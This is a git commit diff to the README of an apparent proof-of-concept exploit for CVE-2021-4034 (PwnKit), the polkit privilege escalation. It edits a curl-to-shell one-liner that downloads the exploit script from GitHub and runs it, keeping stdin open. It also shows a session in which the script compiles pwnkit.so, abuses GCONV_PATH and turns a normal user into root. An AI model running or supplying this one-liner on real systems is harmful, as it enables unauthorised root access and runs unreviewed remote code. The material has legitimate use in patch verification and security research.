One-liner closes stdin

This commit is contained in:
Davide Berardi 2022-01-29 11:46:01 +01:00
parent e5cf2e41c3
commit 6bb8d16985

View File

@ -68,17 +68,17 @@ Polkit (formerly PolicyKit) is a component for controlling system-wide privilege
You can easily exploit the system using a single script, downloadable and executable with this command: You can easily exploit the system using a single script, downloadable and executable with this command:
`curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh` `( curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh ; cat - ) | sh`
```bash ```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh vagrant@ubuntu-impish:~/CVE-2021-4034$ ( curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh ; cat - ) | sh
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034 cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=. mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:. cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami whoami
root root
``` ```